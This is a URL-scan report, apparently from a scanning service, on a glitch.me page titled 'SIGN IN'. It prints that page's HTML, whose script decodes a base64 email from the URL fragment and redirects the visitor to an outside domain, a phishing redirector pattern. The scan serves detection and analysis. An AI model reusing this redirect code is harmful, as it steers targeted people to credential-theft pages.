https://heluniversalec.glitch.me/#

ID da verificação
81369b72-09e8-4608-bfee-e91872acad2eConcluído
URL enviado:
https://heluniversalec.glitch.me/#
Relatório concluído:

Os links de saída identificados na página

Variáveis JavaScript · 5 encontrada(s)

Variáveis JavaScript globais carregadas no objeto janela de uma página são variáveis declaradas fora das funções e acessíveis de qualquer lugar no código dentro do escopo atual

NomeTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
base64Decodefunction
hashstring

Mensagens de registro do console · 1 encontrada(s)

Mensagens registradas no console web

TipoCategoriaLog
errornetwork
URL
https://heluniversalec.glitch.me/favicon.ico
Texto
Failed to load resource: the server responded with a status of 404 ()

HTML

O corpo HTML bruto da página

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SIGN IN</title>
</head>
<body>
<script>
  function base64Decode(str) {
    try {
      return decodeURIComponent(atob(str).split('').map(function(c) {
        return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
      }).join(''));
    } catch (e) {
      console.error('Invalid base64 string:', str);
      return null;
    }
  }

  var hash = window.location.hash;
  if (hash !== "") {
    hash = hash.substring(1); // Remove the '#' character
    const email = base64Decode(hash);

    if (email) {
      window.location.href = "https://sales5rrt.digital/hdqops/Nandsrotomould.html#" + (email);
    }
  }
</script>

</body></html>